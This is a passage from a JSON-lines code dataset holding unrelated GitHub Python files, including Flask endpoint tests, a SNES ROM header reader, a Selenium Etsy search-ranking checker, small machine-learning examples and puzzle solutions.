crawler_time)\n\n    try:\n        with open(\"urls.txt\", \"w\") as out_file:\n            count = 0\n            for img in info:\n                count += 1\n                if count > limit:\n                    break\n                file_name = img[0].split('/')[-1]\n                json = f'{{\"type\":\"pic\", \"name\":\"{file_name}\", \"msg\":\"{img[0]}\"}}\\n'\n
out_file.write(json)\n except Exception as e:\n print(e)\n # download = Download(info)\n # download.run()\n print(\"下載完畢...\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chengen1213/beauty_downloader","sub_path":"beauty_spider2.py","file_name":"beauty_spider2.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39644817803","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport sys\nimport tempfile\nimport unittest\n\n_dir_ = os.path.dirname(os.path.realpath(__file__))\n_root_ = os.path.join(_dir_, '..', '..')\n\nsys.path.append(_root_)\n\nimport Application.statistics as _SAPI\nfrom Application.app import create_app\n\napp = create_app()\napp.config['TESTING'] = True\n\n# Hooks for every request\napp.before_request(_SAPI.pre_req)\napp.after_request(_SAPI.post_req)\n\n\nclass TestForumCreate(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.db_fd, app.config['DATABASE'] = tempfile.mkstemp()\n cls.client = app.test_client()\n\n @classmethod\n def tearDownClass(cls):\n os.close(cls.db_fd)\n os.unlink(app.config['DATABASE'])\n\n def test_api_create_endpoint(self):\n res = self.client.post(\"/web/forum/api/create\", data=json.dumps({}))\n self.assertEqual(res.status_code, 200)\n\n def test_api_create_post_endpoint(self):\n res = self.client.post(\"/web/forum/api/post\", data=json.dumps({}))\n self.assertEqual(res.status_code, 200)\n\n def test_api_latest_threads(self):\n res = self.client.get(\"/web/forum/api/latest\")\n self.assertEqual(res.status_code, 200)\n\n def test_forum_api_thread(self):\n res = self.client.get(\"/web/forum/api/thread/1\")\n self.assertEqual(res.status_code, 200),\n\n def test_statistics(self):\n res = self.client.get(\"/web/api/statistics\")\n self.assertEqual(res.status_code, 200),\n\n def test_user_statistics(self):\n res = self.client.get(\"/web/api/statistics/1\")\n self.assertEqual(res.status_code, 200),\n\n def test_metrics(self):\n res = self.client.get(\"/web/api/metrics\")\n self.assertEqual(res.status_code, 200),\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"CSE-Courses/course-project-a3-massive-muscles","sub_path":"test/backend/test_endpoints.py","file_name":"test_endpoints.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25171928980","text":"# ----------------------------------------\n# pyJSON Schema Loader and JSON Editor - Config Deployment Module\n# author: N. Plathe\n# ----------------------------------------\n\"\"\"\nThis Module deploys a small toy example schema and the config. 
It also contains smaller functions wrapping around saving the\nconfig or the index files.\n\"\"\"\n# ----------------------------------------\n# Music recommendation (albums):\n# Feuerschwanz - Memento Mori\n# Bullet for my Valentine - Bullet for my Valentine\n# ----------------------------------------\n# Libraries\n# ----------------------------------------\n\nimport json\nimport os\nimport logging\n\n# ----------------------------------------\n# Variables and Functions\n# ----------------------------------------\n\nlg = logging.getLogger(__name__)\nlg.setLevel(\"DEBUG\")\n\ndef deploy_schema(path):\n \"\"\"\n deploys the default example schema that is hardcoded here into a path\n\n Args:\n path: the path the schema shall be deployed to.\n\n Returns:\n bool: True, if deployment was successful, False otherwise.\n \"\"\"\n schema = '{\\\n\t \"$schema\": \"https://json-schema.org/draft/2020-12/schema\",\\\n\t \"$id\": \"https://inp-greifswald.de\",\\\n\t \"title\": \"Blank Schema\",\\\n\t \"description\": \"A default Schema for pyJSON. Get\\'s created by the tool on the fly.\",\\\n\t \"type\": \"object\",\\\n\t \"properties\": {\\\n\t\t \"general\": {\\\n\t\t\t \"title\": \"general\",\\\n\t\t\t \"description\": \"I\\'m just a blank test schema. Use me for testing and for trying out functions.\",\\\n\t\t\t \"type\": \"string\"\\\n\t\t },\\\n\t\t \"hierarch\":{\\\n\t\t\t \"title\": \"hierarch\",\\\n\t\t\t \"description\": \"Anchor for the rest.\",\\\n\t\t\t \"type\": \"object\",\\\n \t\t\t\"properties\": {\\\n\t \t\t\t\"Stage 1\":{\\\n\t\t \t\t\t\"title\": \"Stage 1\",\\\n\t\t\t \t\t\"description\": \"Open a Schema from your hard drive and add it to the schema storage. Then select it via the selector.\",\\\n\t\t\t\t \t\"type\": \"string\"\\\n \t\t\t\t},\\\n \t\t\t\t\"Stage 2\":{\\\n\t \t\t\t\t\"title\": \"Stage 2\",\\\n\t\t \t\t\t\"description\": \"You can generate a blank JSON from a schema, load a default for a selected schema or open a JSON and validate it.\",\\\n\t\t\t \t\t\"type\": \"string\"\\\n\t\t\t \t},\\\n \t\t\t\"Example_Number\":{\\\n \t \t\t\t\"title\": \"Example Number/Float Value\",\\\n \t\t \t\t\"description\": \"I am an example Floating Point Number, test the input validation with me.\",\\\n \t\t\t \t\"type\": \"number\"\\\n \t\t\t },\\\n \"Example_Int\":{\\\n \"title\": \"Example Integer Value\",\\\n \"description\": \"I am an example integer, test the input validation with me.\",\\\n \"type\": \"integer\"\\\n }\\\n\t\t\t }\\\n\t\t }\\\n\t }\\\n }'\n try:\n with open(os.path.join(path, \"default.json\"), \"w\", encoding='utf8') as out:\n json.dump(json.loads(schema), out, indent=4, ensure_ascii=False)\n lg.info(\"[deploy_files.deploy_schema/INFO]: Deployed default schema.\")\n except OSError as err:\n lg.error(\"[deploy_files.deploy_schema/ERROR]: Could not write file to directory!\")\n lg.debug(err)\n return False\n return True\n\n\n# main config\n\ndef deploy_config(path):\n \"\"\"\n deploys the config file, which retains last used file, schema and directory\n\n Args:\n path (str): the path, in which the config shall be deployed\n \"\"\"\n config = {\n \"last_dir\": os.getcwd(),\n \"last_schema\": \"default.json\",\n \"last_JSON\": None,\n \"verbose_logging\": False,\n \"show_error_representation\": True\n }\n try:\n with open(os.path.join(path, \"pyJSON_conf.json\"), \"w\", encoding = 'utf8') as out:\n json.dump(config, out, indent = 4, ensure_ascii = False)\n lg.info(\"[deploy_files.deploy_config/INFO]: Deployed config.\")\n except OSError as err:\n 
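# Best-effort write: log the failure and continue instead of raising.\n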
lg.error(\"[deploy_files.deploy_config/ERROR]: Could not set default config.\")\n lg.debug(err)\n\n\ndef save_config(path, config):\n \"\"\"\n Writes the config to the harddrive\n\n Args:\n path (str): the path, in which the config shall be saved or overwritten\n config (dict): the config dictionary\n \"\"\"\n try:\n with open(os.path.join(path, \"pyJSON_conf.json\"), \"w\", encoding = 'utf8') as out:\n json.dump(config, out, indent = 4, ensure_ascii = False)\n except OSError as err:\n lg.error(\"[deploy_files.save_config/ERROR]: Could not save config.\")\n lg.debug(err)\n\n\n# indexes\ndef save_main_index(path, index_dict):\n \"\"\"\n Writes the main index containing information about all indexed directories to the harddrive\n\n Args:\n path (str): the path, in which the main index shall be saved or overwritten\n index_dict (dict): the main index dictionary\n \"\"\"\n try:\n with open(os.path.join(path, \"Indexes/pyJSON_S_index.json\"), \"w\", encoding = 'utf8') as out:\n json.dump(index_dict, out, indent = 4, ensure_ascii = False)\n except OSError as err:\n lg.error(\"[deploy_files.saveMainIndex/ERROR]: Could not save config.\")\n\n\ndef save_index(path, index, count):\n \"\"\"\n Writes the index of a directory to the harddrive\n\n Args:\n path (str): the path the index shall be written or overwritten to\n index (list): the directory index as a list\n count (int): the current index number, since the indexes are numbered\n \"\"\"\n index_d = {\"files\": index}\n try:\n with open(os.path.join(path, \"Indexes/index\" + str(count) + \".json\"), \"w\", encoding ='utf8') as out:\n json.dump(index_d, out, indent = 4, ensure_ascii = False)\n except OSError as err:\n lg.error(\"[deploy_files.saveIndex/ERROR]: Could not save index for \" + path + \".\")\n\n\n# ----------------------------------------\n# Execution\n# ----------------------------------------\n\nif __name__ == \"__main__\":\n lg.info(\"Please don't run me directly, I just provide some files and functions.\")\n lg.info(\"Deploying files in the current working directory.\")\n deploy_config(os.getcwd())\n","repo_name":"nplathe/pyJSON-Schema-Loader-and-JSON-Editor","sub_path":"Modules/deploy_files.py","file_name":"deploy_files.py","file_ext":"py","file_size_in_byte":5978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5152386764","text":"import torch\nimport torch.nn as nn\n\nclass FusionLayer(nn.Module):\n\n def __init__(self, config):\n super(FusionLayer, self).__init__()\n\n self.config = config\n self.attn = SelfAtt(config['id_emb_size'], config['num_heads'])\n\n \n def forward(self, ui_features):\n out = self.attn(ui_features[0], ui_features[1])\n s_u_out, s_i_out = torch.split(out, out.size(1)//2, 1)\n\n u_out = ui_features[0] + s_u_out\n i_out = ui_features[1] + s_i_out\n\n u_out = u_out.reshape(u_out.size(0), -1)\n i_out = i_out.reshape(u_out.size(0), -1)\n\n out = torch.cat([u_out, i_out], 1)\n\n return out\n\n\n\nclass SelfAtt(nn.Module):\n '''\n self attention for interaction\n '''\n def __init__(self, dim, num_heads):\n super(SelfAtt, self).__init__()\n self.encoder_layer = nn.TransformerEncoderLayer(dim, num_heads, 128, 0.4)\n self.encoder = nn.TransformerEncoder(self.encoder_layer, 1)\n\n def forward(self, user_fea, item_fea):\n fea = torch.cat([user_fea, item_fea], 1).permute(1, 0, 2) # batch * 6 * 64\n out = self.encoder(fea)\n return out.permute(1, 0, 
2)","repo_name":"guibitten03/WebMedia-Challange-","sub_path":"framework/fusion.py","file_name":"fusion.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35838696268","text":"from django.db import migrations, models\nimport django.db.models.deletion\nfrom tuli import settings\n\nfrom tuli.models import image_file_upload\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Image',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('lookup', models.CharField(db_index=True, max_length=48)),\n ],\n ),\n migrations.CreateModel(\n name='ImageFile',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tuli.Image')),\n ('file', models.ImageField(upload_to=image_file_upload, height_field=\"height\", width_field=\"width\")),\n ('height', models.PositiveSmallIntegerField()),\n ('width', models.PositiveSmallIntegerField()),\n ],\n options={\n 'get_latest_by': ('image', '-width', '-height'),\n },\n ),\n ]\n","repo_name":"vdamewood/tuli","sub_path":"migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70431811352","text":"#!/usr/bin/env python\n\n# This code explains the usage of variables in python.\n# that is how to assign variables in different ways\n\n# Single assignment\ncounter = 100 # An integer assignment\nmiles = 1000.0 # A floating point\nname = \"John\" # A string\n\n# Multiple Assignments\n# the below code will assign the value 1 to a,b,c\n# simultaneously\na = b = c = 1\n\n# we can also assign multiple variables different\n# values simultaneously\na, b, c = 1, 2, \"john\"\n\n# Number data types store numeric values. 
They are immutable\n# data types, which means that changing the value of a number\n# data type results in a newly allocated object.\n# to delete the reference to a number object we can use the del statement\nvar = 0\ndel var\n\n# To see the exact memory where the variable is stored we can use the id()\n# or use the __repr__ function\nid(counter)\n# to see the hex value use hex() to convert to hex\nhex(id(counter))\n# alternate method to see the memory\ncounter.__repr__\n","repo_name":"kansi/Trail_Python","sub_path":"basic/p001_variables.py","file_name":"p001_variables.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69958358873","text":"from flask import Flask, render_template, request, jsonify, json, session\nfrom datetime import datetime\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver import Keys\n\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom chromedriver_py import binary_path # this will get you the path variable\n\nfrom waitress import serve\nimport json\nimport pymongo\n\ndef selenium_method(id_element, search_text, limit=None, proxy=None):\n # s = Service('./chromedriver/chromedriver')\n s = Service(executable_path=binary_path)\n url_ws = \"https://www.etsy.com/\"\n options = Options()\n if proxy is not None: options.add_argument(f'--proxy-server={proxy}')\n options.add_experimental_option('detach', True)\n driver = webdriver.Chrome(service=s, options=options)\n a = ActionChains(driver)\n # params\n driver.get(url_ws)\n driver.maximize_window()\n #\n input_search = driver.find_element(By.XPATH, \"//input[@data-id='search-query']\")\n input_search.send_keys(search_text)\n\n search = driver.find_element(By.XPATH, \"//button[@data-id='gnav-search-submit-button']\")\n search.click()\n result = None\n try:\n while True:\n time.sleep(3)\n # pagination = driver.find_elements(By.XPATH, '//span[@class=\"screen-reader-only\"]')\n pagination = driver.find_elements(By.XPATH, \"//li[@class='wt-action-group__item-container']\")\n last_pagination = pagination[-2].text\n if last_pagination.isdigit():\n last_pagination = int(last_pagination)\n prev_last_pagination = pagination[-3].text\n print(f'page len:\\t{len(pagination)} | last: {last_pagination}')\n items = driver.find_elements(By.XPATH, \"//div[@class='wt-height-full']\")\n items = list(filter(lambda fit: json.loads(str(fit.get_attribute('data-appears-batch-options')))['total_items'] > 16, items))\n # Ad by Etsy seller\n\n item_title_list = list(map(lambda fit: {\n 'title': str(fit.find_element(By.TAG_NAME, \"a\").get_attribute('title')),\n 'element': fit,\n 'data-listing-id': str(fit.find_element(By.TAG_NAME, \"a\").get_attribute('data-listing-id'))\n }, items))\n current_page = str(driver.current_url).split(\"page=\")\n current_page = 1 if len(current_page) <= 1 else int(current_page[1])\n item_title_list = list(filter(lambda f: f['data-listing-id'] == id_element, item_title_list))\n result_count = len(item_title_list)\n print(f'\\n--------------\\n\\ncurrent_page: {current_page}\\nresult_count: {result_count}\\nlast_pagination: {last_pagination}')\n if result_count > 0 and last_pagination != int(current_page):\n print('YEAH!! 
I found it!!')\n element = item_title_list[0]\n element['element'].click()\n driver.switch_to.window(driver.window_handles[1])\n time.sleep(2)\n screen_shoot = driver.get_screenshot_as_base64()\n result = {\n 'list_id': id_element,\n 'title': element['title'],\n 'search_text': search_text,\n 'screenshot': screen_shoot,\n 'found_page': current_page,\n 'date': datetime.now().isoformat()\n }\n print(result)\n break\n elif result_count == 0 and last_pagination != int(current_page):\n print(f'!!!!!Came here!!!!!\\n{last_pagination}!={current_page}')\n next_button = driver.find_elements(By.XPATH, '//a[@class=\"wt-btn wt-btn--filled wt-action-group__item wt-btn--small wt-btn--icon\"]')\n print(next_button[-1].text)\n next_button[-1].click()\n elif result_count == 0 and last_pagination == int(current_page):\n print(\"end 1\")\n break\n\n if limit is not None and int(current_page) >= int(limit):\n break\n except:\n result = None\n driver.quit()\n return result\n","repo_name":"vagifahmadov/estyBot","sub_path":"helper/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27985757837","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\n\nimport hexview\n\n# My two main sources for this are:\n# https://en.wikibooks.org/wiki/Super_NES_Programming/SNES_memory_map\n# http://www.emulatronia.com/doctec/consolas/snes/sneskart.html#embededcartridge\n\n\nclass Header(object):\n\n HEADER_SIZE = int('20', 16) # 64 byte header\n LOROM_HEADER = int('7FC0', 16) # Lowrom bank ends at 7FFF, with no smc header\n HIROM_HEADER = int('FFC0', 16) # hirom bank ends at FFFF, with no smc header\n\n ROM_TYPES = {0: 'ROM',\n 1: 'ROM and RAM',\n 2: 'ROM and Save RAM',\n 3: 'ROM and DSP1 chip',\n 4: 'ROM, RAM, and DSP1 Chip',\n 5: 'ROM, Save RAM and DSP1 Chip',\n 19: 'ROM and Super FX chip',\n 227: 'ROM, RAM and GameBoy data',\n 246: 'ROM and DSP2 chip'}\n\n COUNTRY_TABLE = {0: 'Japan',\n 1: 'USA',\n 2: 'Australia, Europe, Oceania, and Asia ',\n 3: 'Sweden',\n 4: 'Finland',\n 5: 'Denmark',\n 6: 'France',\n 7: 'Holland',\n 8: 'Spain',\n 9: 'Germany, Austria, and Switzerland',\n 10: 'Italy',\n 11: 'Hong Kong and China',\n 12: 'Indonesia',\n 13: 'Korea'}\n\n LICENSEES = {1: 'Nintendo', 3: 'Imagineer-Zoom', 5: 'Zamuse', 6: 'Falcom', 8: 'Capcom', 9: 'HOT-B',\n 10: 'Jaleco', 11: 'Coconuts', 12: 'Rage Software', 14: 'Technos', 15: 'Mebio Software',\n 18: 'Gremlin Graphics', 19: 'Electronic Arts', 21: 'COBRA Team', 22: 'Human/Field',\n 23: 'KOEI', 24: 'Hudson Soft', 26: 'Yanoman', 28: 'Tecmo', 30: 'Open System',\n 31: 'Virgin Games', 32: 'KSS', 33: 'Sunsoft', 34: 'POW', 35: 'Micro World',\n 38: 'Enix', 39: 'Loriciel/Electro Brain', 40: 'Kemco', 41: 'Seta Co.,Ltd.',\n 45: 'Visit Co.,Ltd.', 49: 'Carrozzeria', 50: 'Dynamic', 51: 'Nintendo', 52: 'Magifact',\n 53: 'Hect', 60: 'Empire Software', 61: 'Loriciel', 64: 'Seika Corp.', 65: 'UBI Soft',\n 70: 'System 3', 71: 'Spectrum Holobyte', 73: 'Irem', 75: 'Raya Systems/Sculptured Software',\n 76: 'Renovation Products', 77: 'Malibu Games/Black Pearl', 79: 'U.S. 
Gold',\n 80: 'Absolute Entertainment', 81: 'Acclaim', 82: 'Activision', 83: 'American Sammy',\n 84: 'GameTek', 85: 'Hi Tech Expressions', 86: 'LJN Toys', 90: 'Mindscape', 93: 'Tradewest',\n 95: 'American Softworks Corp.', 96: 'Titus', 97: 'Virgin Interactive Entertainment',\n 98: 'Maxis', 103: 'Ocean', 105: 'Electronic Arts', 107: 'Laser Beam', 110: 'Elite',\n 111: 'Electro Brain', 112: 'Infogrames', 113: 'Interplay', 114: 'LucasArts',\n 115: 'Parker Brothers', 117: 'STORM', 120: 'THQ Software', 121: 'Accolade Inc.',\n 122: 'Triffix Entertainment', 124: 'Microprose', 127: 'Kemco', 128: 'Misawa', 129: 'Teichio',\n 130: 'Namco Ltd.', 131: 'Lozc', 132: 'Koei', 134: 'Tokuma Shoten Intermedia',\n 136: 'DATAM-Polystar', 139: 'Bullet-Proof Software', 140: 'Vic Tokai', 142: 'Character Soft',\n 143: 'I\\'Max', 144: 'Takara', 145: 'CHUN Soft', 146: 'Video System Co., Ltd.', 147: 'BEC',\n 149: 'Varie', 151: 'Kaneco', 153: 'Pack in Video', 154: 'Nichibutsu', 155: 'TECMO',\n 156: 'Imagineer Co.', 160: 'Telenet', 164: 'Konami', 165: 'K.Amusement Leasing Co.',\n 167: 'Takara', 169: 'Technos Jap.', 170: 'JVC', 172: 'Toei Animation', 173: 'Toho',\n 175: 'Namco Ltd.', 177: 'ASCII Co. Activison', 178: 'BanDai America', 180: 'Enix',\n 182: 'Halken', 186: 'Culture Brain', 187: 'Sunsoft', 188: 'Toshiba EMI',\n 189: 'Sony Imagesoft', 191: 'Sammy', 192: 'Taito', 194: 'Kemco', 195: 'Square',\n 196: 'Tokuma Soft', 197: 'Data East', 198: 'Tonkin House', 200: 'KOEI', 202: 'Konami USA',\n 203: 'NTVIC', 205: 'Meldac', 206: 'Pony Canyon', 207: 'Sotsu Agency/Sunrise',\n 208: 'Disco/Taito', 209: 'Sofel', 210: 'Quest Corp.', 211: 'Sigma', 214: 'Naxat',\n 216: 'Capcom Co., Ltd.', 217: 'Banpresto', 218: 'Tomy', 219: 'Acclaim', 221: 'NCS',\n 222: 'Human Entertainment', 223: 'Altron', 224: 'Jaleco', 226: 'Yutaka', 228: 'T&ESoft',\n 229: 'EPOCH Co.,Ltd.', 231: 'Athena', 232: 'Asmik', 233: 'Natsume', 234: 'King Records',\n 235: 'Atlus', 236: 'Sony Music Entertainment', 238: 'IGS', 241: 'Motown Software',\n 242: 'Left Field Entertainment', 243: 'Beam Software', 244: 'Tec Magik', 249: 'Cybersoft',\n 255: 'Hudson Soft'}\n\n def __init__(self, filename):\n self.filename = filename\n self.smc_offset = self.get_smc_offset(filename)\n self.calculated_checksum = self.calculate_checksum()\n\n for f in (self.LOROM_HEADER, self.HIROM_HEADER):\n rom_segment = hexview.read_file(filename, self.HEADER_SIZE, f + self.smc_offset)\n checksum_and_complement_verfication = self.check_checksum_and_complement(rom_segment)\n potential_rom_mapping = self.get_specified_rom_mapping(rom_segment)\n\n if f == self.LOROM_HEADER:\n possible_types = [32, 35, 48, 50]\n else:\n possible_types = [33, 49, 53]\n\n if (checksum_and_complement_verfication == 'ffff') and (potential_rom_mapping[0] in possible_types):\n self.header = rom_segment\n self.rom_mapping = potential_rom_mapping[1]\n self.header_address = f + self.smc_offset\n\n self.game_title = str(self.header[0:20])\n self.rom_type = self.ROM_TYPES.get(self.header[22])\n self.rom_size = 1 << (self.header[23] - 7)\n self.sram_size = 1 << (self.header[24] + 3)\n self.country = self.COUNTRY_TABLE.get(self.header[25])\n self.licensee = self.LICENSEES.get(self.header[26])\n self.version = self.header[27]\n self.checksum_complement = '{:02x}{:02x}'.format(self.header[29], self.header[28])\n self.header_checksum = '{:02x}{:02x}'.format(self.header[31], self.header[30])\n\n def calculate_checksum(self):\n f = open(self.filename, 'rb')\n f.seek(self.smc_offset)\n chunk_sums = []\n for chunk in read_in_chunks(f):\n 
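# Sum each chunk's bytes; the ROM checksum keeps only the low 16 bits of the grand total.\n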
total = 0\n for byte in chunk:\n total += byte\n chunk_sums.append(total)\n\n total = 0\n\n for csum in chunk_sums:\n total += csum\n\n return '{:04x}'.format(total & int('FFFF', 16))\n\n @staticmethod\n def check_checksum_and_complement(header):\n complement = int('{:02x}{:02x}'.format(header[29], header[28]), 16)\n checksum = int('{:02x}{:02x}'.format(header[31], header[30]), 16)\n return '{:04x}'.format(complement | checksum)\n\n @staticmethod\n def get_specified_rom_mapping(header):\n mapping_type = header[21]\n # yeah, I know a lookup table is lame when this is basically a bitmask\n # problem is, I have trouble resolving some of the values based on the\n # bitmask described https://en.wikibooks.org/wiki/Super_NES_Programming/SNES_memory_map\n # such as SA-1 ROM. For now I'll return both the value and description\n # and the last bit of the value may still be used to verify lo-rom / hi-rom label\n mappings = {32: 'LoROM',\n 33: 'HiRom',\n 35: 'SA-1 ROM',\n 48: 'LoROM + FastROM',\n 49: 'HiRom + FastROM',\n 50: 'ExLoROM',\n 53: 'ExHiRom'}\n return [mapping_type, mappings.get(mapping_type)]\n\n @staticmethod\n def get_smc_offset(filename):\n size = os.path.getsize(filename)\n # https://en.wikibooks.org/wiki/Super_NES_Programming/SNES_memory_map\n # Before you try to load in these informations, you have to determine\n # the size of the SMC, may it be there or not. The length of the ROM\n # modulo 1024 (ROM size % $400) gives you the size of the SMC header.\n # If it's 0, there is no header. If it's not 512, the header is malformed\n return size % 1024\n\n\ndef read_in_chunks(file_object, chunk_size=500000):\n while True:\n data = file_object.read(chunk_size)\n if not data:\n break\n yield data\n\n\ndef main(args):\n for f in args.filename:\n try:\n header = Header(f)\n print()\n\n if header.smc_offset > 0:\n smc = 'Yes'\n else:\n smc = 'No'\n\n print('Game Title: {}'.format(header.game_title))\n print('SMC Header: {}'.format(smc))\n print('Rom Mapping: {}'.format(header.rom_mapping))\n print('Rom Type: {}'.format(header.rom_type))\n print('Rom Size: {} MegaBits'.format(header.rom_size))\n print('SRAM Size: {} Kilobits'.format(header.sram_size))\n print('Country: {}'.format(header.country))\n print('Licensee: {}'.format(header.licensee))\n print('Game Version: {}'.format(header.version))\n print('Checksum Complement: {}'.format(header.checksum_complement))\n print('Specified Checksum: {}'.format(header.header_checksum))\n print('Calculated checksum: {}'.format(header.calculated_checksum))\n\n print()\n hexview.print_canonical(header.header, header.header_address)\n print()\n\n except FileNotFoundError:\n print('File {} was not found'.format(f))\n except Exception as e:\n print('In {}: General error {}. 
May not be an SNES ROM file.'.format(f, e))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='snes_rom_info.py', usage='%(prog)s filename')\n parser.add_argument('filename', help=\"The ROM you wish to analyze\", nargs='*')\n args = parser.parse_args()\n main(args)\n","repo_name":"tetrismegistus/snes_rom_info","sub_path":"snes_rom_info.py","file_name":"snes_rom_info.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"70760143513","text":"hash_fn = lambda x: (3 * x + 1) % 5\n\n\ndef fm(inp, hash_fns=(hash_fn, )):\n \"\"\"\n inp: iterable of ints\n hash_fns: list of callables with one input.\n \"\"\"\n last_set_value = lambda n: (n & ~(n - 1)) # face value of last set bit\n est = [max(map(lambda x: last_set_value(hfn(x)), inp)) for hfn in hash_fns]\n print(f\"Average estimated unique values: {sum(est) / len(est)}\")\n\n\nif __name__ == '__main__':\n inp = [10, 12, 13, 3, 4, 25, 7, 10, 4]\n fm(inp)\n\n","repo_name":"bhushan-borole/BDA-Experiments","sub_path":"flajolet_martin/fm_rishabh_one_liner.py","file_name":"fm_rishabh_one_liner.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"21700435004","text":"from typing import List, Optional\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def divideAndConquer(self, root: Optional[TreeNode], left: Optional[TreeNode], right: Optional[TreeNode]) -> bool:\n if not root: return True\n if left and left.val >= root.val : return False\n if right and root.val >= right.val: return False\n if not self.divideAndConquer(root.left, left, root) : return False\n if not self.divideAndConquer(root.right, root, right) : return False\n return True\n\n def isValidBST(self, root: Optional[TreeNode]) -> bool:\n return self.divideAndConquer(root, None, None)\n \n ","repo_name":"svefa/coding_tasks_python","sub_path":"bst/validate/isValidBST.py","file_name":"isValidBST.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
+{"seq_id":"42016522883","text":"# -*- coding: utf-8 -*-\n# @Date : 2020-01-22\n# @Author : water\n# @Version : v1.0\n# @Desc : Linear regression prediction with ordinary least squares\n# 1. Use linear regression to predict diabetes progression, using the fourth feature (index 3 in the array)\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.linear_model import LinearRegression\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef linear1():\n # 1. Load the data\n datas = load_diabetes()\n x = datas.data[:,np.newaxis,3]\n y = datas.target[:,np.newaxis]\n # print(x) # \n # print(y.shape)\n # print(datas.DESCR)\n # 2. Prepare the data\n x_train = x[:-40]\n y_train = y[:-40]\n print(x_train.shape)\n x_test = x[-40:]\n y_test = y[-40:]\n # 3. Build the model\n linear = LinearRegression()\n # 4. Train the model\n linear.fit(x_train,y_train)\n # 5. Results\n y_predict = linear.predict(x_test)\n print(linear.score(x_test,y_test))\n # 6. Plot\n plt.scatter(x_test,y_test)\n plt.plot(x_test,y_predict)\n plt.show()\n\ndef linear2():\n '''\n Solve the system of equations\n x+y=3\n x-y=1\n x=2, y=1 --> expected result\n :return:\n '''\n x_train = np.array([[1,1],[1,-1]])\n y_train = np.array([3,1])\n result = np.dot(np.linalg.inv(x_train),y_train)\n print(result)\n linear = LinearRegression()\n linear.fit(x_train,y_train)\n x_test = np.array([[1,0],[0,1]])\n print(linear.coef_)\n y_predict = 
linear.predict(x_test)\n print(y_predict)\n\n\ndef main():\n # linear1()\n linear2()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"gin2010/python_study","sub_path":"data_and_ai/machine_learn/linear_start.py","file_name":"linear_start.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9749281645","text":"#!/usr/bin/env python3\n\nclass Map(object):\n def __init__(self, m, bg):\n self.m = m\n self.swap = {}\n self.bg = bg\n xmin = ymin = 1E10\n xmax = ymax = -1E10\n for x, y in self.m.keys():\n if xmin > x: xmin = x\n if xmax < x: xmax = x\n if ymin > y: ymin = y\n if ymax < y: ymax = y\n self.pmin = xmin, ymin\n self.pmax = xmax+1, ymax+1\n\n def enhance(self, index):\n if self.bg == \"#\":\n nbg = index[-1]\n else:\n nbg = index[0]\n\n xmin = ymin = 1E10\n xmax = ymax = -1E10\n self.swap.clear()\n for y in range(self.pmin[1]-2, self.pmax[1]+2):\n for x in range(self.pmin[0]-2, self.pmax[0]+2):\n idx = 0\n for ny in range(y-1, y+2):\n for nx in range(x-1, x+2):\n idx <<= 1\n if self.m.get((nx, ny), self.bg) == \"#\":\n idx |= 1\n if index[idx] != nbg:\n self.swap[x, y] = index[idx]\n if xmin > x: xmin = x\n if xmax < x: xmax = x\n if ymin > y: ymin = y\n if ymax < y: ymax = y\n\n self.m, self.swap = self.swap, self.m\n self.bg = nbg\n self.pmin = xmin, ymin\n self.pmax = xmax+1, ymax+1\n\ndef parse(txt):\n algo, m = None, {}\n state = 0\n y = 0\n for row in txt.splitlines():\n if state == 0:\n if not row:\n state = 1\n else:\n algo = row\n else:\n for x, e in enumerate(row):\n if e == \"#\":\n m[x, y] = e\n y += 1\n\n return Map(m, \".\"), algo\n\nimport sys\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Usage: {} \".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n try:\n with open(sys.argv[1], \"rt\") as f:\n txt = f.read()\n\n m, algo = parse(txt)\n for i in 